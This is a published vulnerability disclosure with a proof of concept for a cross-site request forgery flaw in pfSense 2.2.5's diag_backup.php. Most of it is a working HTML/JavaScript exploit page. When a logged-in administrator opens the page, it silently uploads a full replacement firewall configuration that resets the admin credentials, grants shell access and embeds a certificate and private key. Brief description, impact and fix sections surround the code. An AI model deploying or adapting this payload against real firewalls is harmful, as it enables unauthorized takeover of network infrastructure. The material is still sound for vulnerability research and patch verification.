pfSense Firewall 2.2.5 Cross Site Request Forgery
Posted on 26 January 2016
<!-- # Exploit Title: pfSense Firewall 2.2.5 Cross-Site Request Forgery # Date: 23-01-2016 # Software Link: http://mirror.ancl.hawaii.edu/pub/pfSense/downloads/pfSense-2.2.5-RELEASE-1g-amd64-nanobsd.img.gz # Exploit Author: Aatif Shahdad # Twitter: https://twitter.com/61617469665f736 # Contact: aatif_shahdad@icloud.com # Category: webapps 1. Description The page diag_backup.php had CSRF checking disabled for all functions, including the restore function. As a result, a specially crafted attacker page could cause a logged-in administrator to upload a config.xml crafted by the attacker. 2. Proof of Concept Login as admin to the Web Console at http://192.168.0.103 (set at the time on install). Open the following Proof-Of-Concept with the browser that you used to log in to the Firewall. POC to upload crafted config.xml: --POC begins-- --> <html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https://192.168.0.103/diag_backup.php", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------8271879791886716022292650152"); xhr.withCredentials = true; var body = "-----------------------------8271879791886716022292650152 " + "Content-Disposition: form-data; name="backuparea" " + " " + " " + "-----------------------------8271879791886716022292650152 " + "Content-Disposition: form-data; name="donotbackuprrd" " + " " + "on " + "-----------------------------8271879791886716022292650152 " + "Content-Disposition: form-data; name="encrypt_password" " + " " + " " + "-----------------------------8271879791886716022292650152 " + "Content-Disposition: form-data; name="encrypt_passconf" " + " " + " " + "-----------------------------8271879791886716022292650152 " + "Content-Disposition: form-data; name="restorearea" " + " " + " " + "-----------------------------8271879791886716022292650152 " + "Content-Disposition: form-data; name="conffile"; filename="config-pfSense.localdomain-20160123123616.xml" " + "Content-Type: text/xml " + " " + "x3c?xml version="1.0"?x3e " + "x3cpfsensex3e " + " x3cversionx3e12.0x3c/versionx3e " + " x3clastchange/x3e " + " x3cthemex3epfsense_ngx3c/themex3e " + " x3csystemx3e " + " x3coptimizationx3enormalx3c/optimizationx3e " + " x3chostnamex3epfSensex3c/hostnamex3e " + " x3cdomainx3elocaldomainx3c/domainx3e " + " x3cgroupx3e " + " x3cnamex3eallx3c/namex3e " + " x3cdescriptionx3ex3c![CDATA[All Users]]x3ex3c/descriptionx3e " + " x3cscopex3esystemx3c/scopex3e " + " x3cgidx3e1998x3c/gidx3e " + " x3cmemberx3e0x3c/memberx3e " + " x3c/groupx3e " + " x3cgroupx3e " + " x3cnamex3eadminsx3c/namex3e " + " x3cdescriptionx3ex3c![CDATA[System Administrators]]x3ex3c/descriptionx3e " + " x3cscopex3esystemx3c/scopex3e " + " x3cgidx3e1999x3c/gidx3e " + " x3cmemberx3e0x3c/memberx3e " + " x3cprivx3epage-allx3c/privx3e " + " x3c/groupx3e " + " x3cuserx3e " + " x3cnamex3eadminx3c/namex3e " + " x3cdescrx3ex3c![CDATA[System Administrator]]x3ex3c/descrx3e " + " x3cscopex3esystemx3c/scopex3e " + " x3cgroupnamex3eadminsx3c/groupnamex3e " + " x3cpasswordx3e$1$HuUrmCMQ$HcpUfJ7bi2kDoPmwaW5Hf.x3c/passwordx3e " + " x3cuidx3e0x3c/uidx3e " + " x3cprivx3euser-shell-accessx3c/privx3e " + " x3cmd5-hashx3e3a4b4c4dde494d2cec3e0ea68e437e17x3c/md5-hashx3e " + " x3cnt-hashx3e3338333834323034353935373932633863623430663264336164663532353636x3c/nt-hashx3e " + " x3c/userx3e " + " x3cnextuidx3e2000x3c/nextuidx3e " + " x3cnextgidx3e2000x3c/nextgidx3e " + " x3ctimezonex3eEtc/UTCx3c/timezonex3e " + " x3ctime-update-interval/x3e " + " x3ctimeserversx3e0.pfsense.pool.ntp.orgx3c/timeserversx3e " + " x3cwebguix3e " + " x3cprotocolx3ehttpsx3c/protocolx3e " + " x3cloginautocomplete/x3e " + " x3cssl-certrefx3e56a352ca3e5fbx3c/ssl-certrefx3e " + " x3c/webguix3e " + " x3cdisablenatreflectionx3eyesx3c/disablenatreflectionx3e " + " x3cdisablesegmentationoffloading/x3e " + " x3cdisablelargereceiveoffloading/x3e " + " x3cipv6allow/x3e " + " x3cpowerd_ac_modex3ehadpx3c/powerd_ac_modex3e " + " x3cpowerd_battery_modex3ehadpx3c/powerd_battery_modex3e " + " x3cpowerd_normal_modex3ehadpx3c/powerd_normal_modex3e " + " x3cbogonsx3e " + " x3cintervalx3emonthlyx3c/intervalx3e " + " x3c/bogonsx3e " + " x3ckill_states/x3e " + " x3clanguagex3een_USx3c/languagex3e " + " x3cdns1gwx3enonex3c/dns1gwx3e " + " x3cdns2gwx3enonex3c/dns2gwx3e " + " x3cdns3gwx3enonex3c/dns3gwx3e " + " x3cdns4gwx3enonex3c/dns4gwx3e " + " x3cdnsserverx3e8.8.8.8x3c/dnsserverx3e " + " x3cdnsserverx3e8.8.8.8x3c/dnsserverx3e " + " x3cdnsallowoverride/x3e " + " x3c/systemx3e " + " x3cinterfacesx3e " + " x3cwanx3e " + " x3cenable/x3e " + " x3cifx3eem0x3c/ifx3e " + " x3cipaddrx3edhcpx3c/ipaddrx3e " + " x3cipaddrv6x3edhcp6x3c/ipaddrv6x3e " + " x3cgateway/x3e " + " x3cblockbogonsx3eonx3c/blockbogonsx3e " + " x3cmedia/x3e " + " x3cmediaopt/x3e " + " x3cdhcp6-duid/x3e " + " x3cdhcp6-ia-pd-lenx3e0x3c/dhcp6-ia-pd-lenx3e " + " x3c/wanx3e " + " x3c/interfacesx3e " + " x3cstaticroutes/x3e " + " x3cdhcpd/x3e " + " x3cpptpdx3e " + " x3cmode/x3e " + " x3credir/x3e " + " x3clocalip/x3e " + " x3cremoteip/x3e " + " x3c/pptpdx3e " + " x3csnmpdx3e " + " x3csyslocation/x3e " + " x3csyscontact/x3e " + " x3crocommunityx3epublicx3c/rocommunityx3e " + " x3c/snmpdx3e " + " x3cdiagx3e " + " x3cipv6natx3e " + " x3cipaddr/x3e " + " x3c/ipv6natx3e " + " x3c/diagx3e " + " x3cbridge/x3e " + " x3csyslog/x3e " + " x3cfilterx3e " + " x3crulex3e " + " x3ctypex3epassx3c/typex3e " + " x3cipprotocolx3einetx3c/ipprotocolx3e " + " x3cdescrx3ex3c![CDATA[Default allow LAN to any rule]]x3ex3c/descrx3e " + " x3cinterfacex3elanx3c/interfacex3e " + " x3ctrackerx3e0100000101x3c/trackerx3e " + " x3csourcex3e " + " x3cnetworkx3elanx3c/networkx3e " + " x3c/sourcex3e " + " x3cdestinationx3e " + " x3cany/x3e " + " x3c/destinationx3e " + " x3c/rulex3e " + " x3crulex3e " + " x3ctypex3epassx3c/typex3e " + " x3cipprotocolx3einet6x3c/ipprotocolx3e " + " x3cdescrx3ex3c![CDATA[Default allow LAN IPv6 to any rule]]x3ex3c/descrx3e " + " x3cinterfacex3elanx3c/interfacex3e " + " x3ctrackerx3e0100000102x3c/trackerx3e " + " x3csourcex3e " + " x3cnetworkx3elanx3c/networkx3e " + " x3c/sourcex3e " + " x3cdestinationx3e " + " x3cany/x3e " + " x3c/destinationx3e " + " x3c/rulex3e " + " x3c/filterx3e " + " x3cipsec/x3e " + " x3caliases/x3e " + " x3cproxyarp/x3e " + " x3ccronx3e " + " x3citemx3e " + " x3cminutex3e1,31x3c/minutex3e " + " x3chourx3e0-5x3c/hourx3e " + " x3cmdayx3e*x3c/mdayx3e " + " x3cmonthx3e*x3c/monthx3e " + " x3cwdayx3e*x3c/wdayx3e " + " x3cwhox3erootx3c/whox3e " + " x3ccommandx3e/usr/bin/nice -n20 adjkerntz -ax3c/commandx3e " + " x3c/itemx3e " + " x3citemx3e " + " x3cminutex3e1x3c/minutex3e " + " x3chourx3e3x3c/hourx3e " + " x3cmdayx3e1x3c/mdayx3e " + " x3cmonthx3e*x3c/monthx3e " + " x3cwdayx3e*x3c/wdayx3e " + " x3cwhox3erootx3c/whox3e " + " x3ccommandx3e/usr/bin/nice -n20 /etc/rc.update_bogons.shx3c/commandx3e " + " x3c/itemx3e " + " x3citemx3e " + " x3cminutex3e*/60x3c/minutex3e " + " x3chourx3e*x3c/hourx3e " + " x3cmdayx3e*x3c/mdayx3e " + " x3cmonthx3e*x3c/monthx3e " + " x3cwdayx3e*x3c/wdayx3e " + " x3cwhox3erootx3c/whox3e " + " x3ccommandx3e/usr/bin/nice -n20 /usr/local/sbin/expiretable -v -t 3600 sshlockoutx3c/commandx3e " + " x3c/itemx3e " + " x3citemx3e " + " x3cminutex3e*/60x3c/minutex3e " + " x3chourx3e*x3c/hourx3e " + " x3cmdayx3e*x3c/mdayx3e " + " x3cmonthx3e*x3c/monthx3e " + " x3cwdayx3e*x3c/wdayx3e " + " x3cwhox3erootx3c/whox3e " + " x3ccommandx3e/usr/bin/nice -n20 /usr/local/sbin/expiretable -v -t 3600 webConfiguratorlockoutx3c/commandx3e " + " x3c/itemx3e " + " x3citemx3e " + " x3cminutex3e1x3c/minutex3e " + " x3chourx3e1x3c/hourx3e " + " x3cmdayx3e*x3c/mdayx3e " + " x3cmonthx3e*x3c/monthx3e " + " x3cwdayx3e*x3c/wdayx3e " + " x3cwhox3erootx3c/whox3e " + " x3ccommandx3e/usr/bin/nice -n20 /etc/rc.dyndns.updatex3c/commandx3e " + " x3c/itemx3e " + " x3citemx3e " + " x3cminutex3e*/60x3c/minutex3e " + " x3chourx3e*x3c/hourx3e " + " x3cmdayx3e*x3c/mdayx3e " + " x3cmonthx3e*x3c/monthx3e " + " x3cwdayx3e*x3c/wdayx3e " + " x3cwhox3erootx3c/whox3e " + " x3ccommandx3e/usr/bin/nice -n20 /usr/local/sbin/expiretable -v -t 3600 virusprotx3c/commandx3e " + " x3c/itemx3e " + " x3citemx3e " + " x3cminutex3e30x3c/minutex3e " + " x3chourx3e12x3c/hourx3e " + " x3cmdayx3e*x3c/mdayx3e " + " x3cmonthx3e*x3c/monthx3e " + " x3cwdayx3e*x3c/wdayx3e " + " x3cwhox3erootx3c/whox3e " + " x3ccommandx3e/usr/bin/nice -n20 /etc/rc.update_urltablesx3c/commandx3e " + " x3c/itemx3e " + " x3c/cronx3e " + " x3cwol/x3e " + " x3crrdx3e " + " x3cenable/x3e " + " x3c/rrdx3e " + " x3cload_balancerx3e " + " x3cmonitor_typex3e " + " x3cnamex3eICMPx3c/namex3e " + " x3ctypex3eicmpx3c/typex3e " + " x3cdescrx3ex3c![CDATA[ICMP]]x3ex3c/descrx3e " + " x3coptions/x3e " + " x3c/monitor_typex3e " + " x3cmonitor_typex3e " + " x3cnamex3eTCPx3c/namex3e " + " x3ctypex3etcpx3c/typex3e " + " x3cdescrx3ex3c![CDATA[Generic TCP]]x3ex3c/descrx3e " + " x3coptions/x3e " + " x3c/monitor_typex3e " + " x3cmonitor_typex3e " + " x3cnamex3eHTTPx3c/namex3e " + " x3ctypex3ehttpx3c/typex3e " + " x3cdescrx3ex3c![CDATA[Generic HTTP]]x3ex3c/descrx3e " + " x3coptionsx3e " + " x3cpathx3e/x3c/pathx3e " + " x3chost/x3e " + " x3ccodex3e200x3c/codex3e " + " x3c/optionsx3e " + " x3c/monitor_typex3e " + " x3cmonitor_typex3e " + " x3cnamex3eHTTPSx3c/namex3e " + " x3ctypex3ehttpsx3c/typex3e " + " x3cdescrx3ex3c![CDATA[Generic HTTPS]]x3ex3c/descrx3e " + " x3coptionsx3e " + " x3cpathx3e/x3c/pathx3e " + " x3chost/x3e " + " x3ccodex3e200x3c/codex3e " + " x3c/optionsx3e " + " x3c/monitor_typex3e " + " x3cmonitor_typex3e " + " x3cnamex3eSMTPx3c/namex3e " + " x3ctypex3esendx3c/typex3e " + " x3cdescrx3ex3c![CDATA[Generic SMTP]]x3ex3c/descrx3e " + " x3coptionsx3e " + " x3csend/x3e " + " x3cexpectx3e220 *x3c/expectx3e " + " x3c/optionsx3e " + " x3c/monitor_typex3e " + " x3c/load_balancerx3e " + " x3cwidgetsx3e " + " x3csequencex3esystem_information-container:col1:show,captive_portal_status-container:col1:close,carp_status-container:col1:close,cpu_graphs-container:col1:close,gateways-container:col1:close,gmirror_status-container:col1:close,installed_packages-container:col1:close,interface_statistics-container:col1:close,interfaces-container:col2:show,ipsec-container:col2:close,load_balancer_status-container:col2:close,log-container:col2:close,picture-container:col2:close,rss-container:col2:close,services_status-container:col2:close,traffic_graphs-container:col2:closex3c/sequencex3e " + " x3c/widgetsx3e " + " x3copenvpn/x3e " + " x3cdnshaper/x3e " + " x3cunboundx3e " + " x3cenable/x3e " + " x3cdnssec/x3e " + " x3cactive_interface/x3e " + " x3coutgoing_interface/x3e " + " x3ccustom_options/x3e " + " x3chideidentity/x3e " + " x3chideversion/x3e " + " x3cdnssecstripped/x3e " + " x3c/unboundx3e " + " x3cvlans/x3e " + " x3crevisionx3e " + " x3ctimex3e1453547589x3c/timex3e " + " x3cdescriptionx3ex3c![CDATA[admin@192.168.0.101: System: ]]x3ex3c/descriptionx3e " + " x3cusernamex3eadmin@192.168.0.101x3c/usernamex3e " + " x3c/revisionx3e " + " x3cshaper/x3e " + " x3ccertx3e " + " x3crefidx3e56a352ca3e5fbx3c/refidx3e " + " x3cdescrx3ex3c![CDATA[webConfigurator default (56a352ca3e5fb)]]x3ex3c/descrx3e " + " x3ctypex3eserverx3c/typex3e " + " x3ccrtx3eLS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUZiVENDQkZXZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBRENCdERFTE1Ba0dBMVVFQmhNQ1ZWTXgKRGpBTUJnTlZCQWdUQlZOMFlYUmxNUkV3RHdZRFZRUUhFd2hNYjJOaGJHbDBlVEU0TURZR0ExVUVDaE12Y0daVApaVzV6WlNCM1pXSkRiMjVtYVdkMWNtRjBiM0lnVTJWc1ppMVRhV2R1WldRZ1EyVnlkR2xtYVdOaGRHVXhLREFtCkJna3Foa2lHOXcwQkNRRVdHV0ZrYldsdVFIQm1VMlZ1YzJVdWJHOWpZV3hrYjIxaGFXNHhIakFjQmdOVkJBTVQKRlhCbVUyVnVjMlV0TlRaaE16VXlZMkV6WlRWbVlqQWVGdzB4TmpBeE1qTXhNREUxTXpoYUZ3MHlNVEEzTVRVeApNREUxTXpoYU1JRzBNUXN3Q1FZRFZRUUdFd0pWVXpFT01Bd0dBMVVFQ0JNRlUzUmhkR1V4RVRBUEJnTlZCQWNUCkNFeHZZMkZzYVhSNU1UZ3dOZ1lEVlFRS0V5OXdabE5sYm5ObElIZGxZa052Ym1acFozVnlZWFJ2Y2lCVFpXeG0KTFZOcFoyNWxaQ0JEWlhKMGFXWnBZMkYwWlRFb01DWUdDU3FHU0liM0RRRUpBUllaWVdSdGFXNUFjR1pUWlc1egpaUzVzYjJOaGJHUnZiV0ZwYmpFZU1Cd0dBMVVFQXhNVmNHWlRaVzV6WlMwMU5tRXpOVEpqWVRObE5XWmlNSUlCCklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUE1OEwyN3dFMnc5NGtONWpPdS9UMFVHYTYKcjBGUlptM2ZDdmdRdElpUHZVUEN4SHpkQ3RyalRCaUdZK3grU0t4cFpEREJvdGg4cmQzS1dSdWRIajR6cFpnSwpKOXR5djJhVXNTQ3Jqd3NCc3Fva0RzdHNaUlR2RkRPTE9kd2xKNDBxV2grVjNINStiOWNKM09SN1d2Zkc4MHdGClJQbjdCMTFlMHdJVU1OSkhjbWtpbHRva0lVSlJRbWtSSTU1K3dnQkdrWUlwTTJCOTdQc0tWSVdjUnVQSnhRcFQKY0l4VmFvNmtIVDFBQytsU2RxK0x6UWlrSTJBRkU3a1RjeDVFK28yZnRWRlZySHI2b1hhdlYzRCtoZmRwaFp0VgpTQllXYUZycDZlVUJwYm5zQlR0c2orUlp1S1RmWEczSTJQTWFWOVAyNkJ2VU5xVXhtdkJsc3BZRTRJaVFld0lECkFRQUJvNElCaGpDQ0FZSXdDUVlEVlIwVEJBSXdBREFSQmdsZ2hrZ0JodmhDQVFFRUJBTUNCa0F3TXdZSllJWkkKQVliNFFnRU5CQ1lXSkU5d1pXNVRVMHdnUjJWdVpYSmhkR1ZrSUZObGNuWmxjaUJEWlhKMGFXWnBZMkYwWlRBZApCZ05WSFE0RUZnUVVCUmNZeGlxaEkreE1FWjEwcnlFVS9NWWZLeUV3Z2VFR0ExVWRJd1NCMlRDQjFvQVVCUmNZCnhpcWhJK3hNRVoxMHJ5RVUvTVlmS3lHaGdicWtnYmN3Z2JReEN6QUpCZ05WQkFZVEFsVlRNUTR3REFZRFZRUUkKRXdWVGRHRjBaVEVSTUE4R0ExVUVCeE1JVEc5allXeHBkSGt4T0RBMkJnTlZCQW9UTDNCbVUyVnVjMlVnZDJWaQpRMjl1Wm1sbmRYSmhkRzl5SUZObGJHWXRVMmxuYm1Wa0lFTmxjblJwWm1sallYUmxNU2d3SmdZSktvWklodmNOCkFRa0JGaGxoWkcxcGJrQndabE5sYm5ObExteHZZMkZzWkc5dFlXbHVNUjR3SEFZRFZRUURFeFZ3WmxObGJuTmwKTFRVMllUTTFNbU5oTTJVMVptS0NBUUF3SFFZRFZSMGxCQll3RkFZSUt3WUJCUVVIQXdFR0NDc0dBUVVGQ0FJQwpNQXNHQTFVZER3UUVBd0lGb0RBTkJna3Foa2lHOXcwQkFRc0ZBQU9DQVFFQXREcklKREwxYmpiR1IwVS8wTjRICkpPRi9NT1BWSFNLZVp0V2k1eWFFOTR0VlRxbmNYVWNpalRncS8xNHB0NGRzbkl6ek56dFh2aE5wdEl0ZzlTeDIKcnNaRGJEYzNGaXZveUxtU1RQY0E3WGh4MlBJRUdFYzhKRi9CK1I1UDVhRGtGTFRBNE5KMUc1ZXo5UkxERmd3Ngp5TnlUNlJoRkZONXhreXpZY3BHSFZZZTZUQXh1WGdNOVRWdXhENXI5RWJROG53eGE5TnBmSFl0RmhydFN0N3pvCmsvaC9vQnpHeS9JZEh3Y1RHQStkYm9mOUdiNnhkSWFvTGdhc1I5SVovTmFQQUliVFVKTmpMZHhhRXNkbTdsMlcKMUc3NjY2bGphSnB5R1BQRmFtODNrZVZvZzBicmJOMFpwYStMRm0vSW54SVgvT3VDT0M3WmNtS0lPT1p6cTRHdQpiZz09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0Kx3c/crtx3e " + " x3cprvx3eLS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUV2d0lCQURBTkJna3Foa2lHOXcwQkFRRUZBQVNDQktrd2dnU2xBZ0VBQW9JQkFRRG53dmJ2QVRiRDNpUTMKbU02NzlQUlFacnF2UVZGbWJkOEsrQkMwaUkrOVE4TEVmTjBLMnVOTUdJWmo3SDVJckdsa01NR2kySHl0M2NwWgpHNTBlUGpPbG1Bb24yM0svWnBTeElLdVBDd0d5cWlRT3kyeGxGTzhVTTRzNTNDVW5qU3BhSDVYY2ZuNXYxd25jCjVIdGE5OGJ6VEFWRStmc0hYVjdUQWhRdzBrZHlhU0tXMmlRaFFsRkNhUkVqbm43Q0FFYVJnaWt6WUgzcyt3cFUKaFp4RzQ4bkZDbE53akZWcWpxUWRQVUFMNlZKMnI0dk5DS1FqWUFVVHVSTnpIa1Q2alorMVVWV3NldnFoZHE5WApjUDZGOTJtRm0xVklGaFpvV3VucDVRR2x1ZXdGTzJ5UDVGbTRwTjljYmNqWTh4cFgwL2JvRzlRMnBUR2E4R1d5CmxnVGdpSkI3QWdNQkFBRUNnZ0VCQUs2ZjlEYzVqdTRlSHVQVk8wL2J6WW9YSFdxWHFLR28vM25nVjVYdm4zNVgKNUJUd2tBeHh5UG01TU9seGMrV0dJeExldWNmZG5uUFN2WGhPbWlBRGRoNjdaRXVMeWZYMWNPdlZWZTY5dUZYSwpaTWpROWFka0VwQUNGbEZPVXFCdWVRN1c1YS94ajRydFYvMGNHdVg3OCtlMXkvS2crRWdnVGlablZwZENtWnJWCnRhTXhkcmRIemR0NjlGaU1MWU1kaE9iMUN0azEvRFp4dzhETDB6RXBseWpQNEE5MDA2VWJtT2Y3WXlRQUpkeEcKVGlwNzY5RkdML2x6MU1SVmNmb2drUVRzU0w5OHpuSUNqTXRXeWozL2FrYkxtRCtGeHRaU2UzNHl4c2xoc0I5bApocFJ0alBIUWQ5cmtYYWR4WW51SzJ0U0pxQTgxREhYNFhyQWVmb0RrbjhFQ2dZRUE5MFlIaTJtR2dTRm5mdVFGCnpzRkNXU0ZZbWhrSnZLbVFKQ3NXWW5NN2JoNVdPVnBaM2d3RXh1MFNpdE5aWDBVaWRkR1U5NUhCdUtDWnNvRHEKQnlwQTRuUXdUdkVtWGdpNEh4cGd4bUJDSGkvRGt6eDhpVkkwd3BKNXJzWjBpNXlIcHZtYVVRT0t4WG9FOVpnUApXR1FVSDNUTXViOElsN2RWS2JISjN3T2tJUk1DZ1lFQTcvRExLYXFkWFc5OTlCd00zZlhHNkJYaUxDSXhwaGh3Cm9jSHF0ekxMcS9Ra0dVSzhaTWRlWTNhYi85dHFMWkVBMlVLQjJLdW5ZQUcyVUJZQmNiaVFNNTFCNHREemgvZ20KbTUwSmVMZjZ1SWFRdlAxeVV6QWE1NXpiTEx4WTRlZ2s1MFpZeXErWmF5TEd3dm5PeUVyN3pSWEM0REQrK3RjZQpTaW4rKzFXTHAva0NnWUVBaHFRT0ZaNDNDL2NKYUxGMmJCY1ZMbjBXeG9tZG9LbmZmNklxaFI3am5GbE9iOW8vCmxzV0trRnFrUHcxSDI3VkVSMDBBUlRHTGZ5R0xyd084Nm52YWFyUURYZWkzRUhyRTdzS3BNVHRXcFNNeTVlZ0kKazZrOGF6bmdvZ2NUakxXRnM2aXpteXRIazdHV0k3aFJtcnFicm1rbDFIb3RqcGJYKzJVQVc3dWEwaHNDZ1lCLwpsSHFDUWkwQWhJcmxaSkRXNkp1RnhqVUhvSHJqeFRVR1haVFBLbHd2cDFZV2RHeTE3V2hiM0xKZ0hpdmI1TEVkCjFJWTBUamxtRENNRGZGL3lOdCsrQWcwSmJHOUJTZ3BGVGYrK1I1MHh4cU5wU2g0aTYzNHl6eTJmSU5ybDY4akwKakpVajJMRHJ6WWNBSDFIN0lCdTVWYXZVQjFsY3lVdGF4ZS9GZGh3WENRS0JnUURDMlJvN0ZETFNqYlI1RDYyVgoxSkgzVFV1Z2ZiRmliQllRazYrMit6eHVjeTN4V3B1UnBWYVRqSGJvS3N6S2NTS09UK251cWJ4YS9Fbmh0VFZlClc1WnJGMlM3VkpPcERZVEwyZkR0VmJZZ0xJUmp5d0JKM3lUTmFoWmxUZ0FVKzM1MGgvV0NEcnVHMXVqZnJOVzAKZ3pFeU9nRSt3UWNMSi8rNmNHZjk1Mmg4b2c9PQotLS0tLUVORCBQUklWQVRFIEtFWS0tLS0tCg==x3c/prvx3e " + " x3c/certx3e " + " x3cppps/x3e " + "x3c/pfsensex3e " + " " + "-----------------------------8271879791886716022292650152 " + "Content-Disposition: form-data; name="decrypt_password" " + " " + " " + "-----------------------------8271879791886716022292650152 " + "Content-Disposition: form-data; name="decrypt_passconf" " + " " + " " + "-----------------------------8271879791886716022292650152 " + "Content-Disposition: form-data; name="Submit" " + " " + "Restore configuration " + "-----------------------------8271879791886716022292650152-- "; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> <!-- --End of POC-- Firewall will restart and the Firewall config changes will take place as specified by us in our POC. Note: Username and Password after POC is run are: admin and pfsense respectively. 3. Impact On diag_backup.php, the firewall configuration could be altered or replaced if the administrator could be tricked into loading a specially crafted page while also logged into the firewall with the same browser session. 4. Solution: Update to version 2.2.6 https://www.pfsense.org/download/ -->
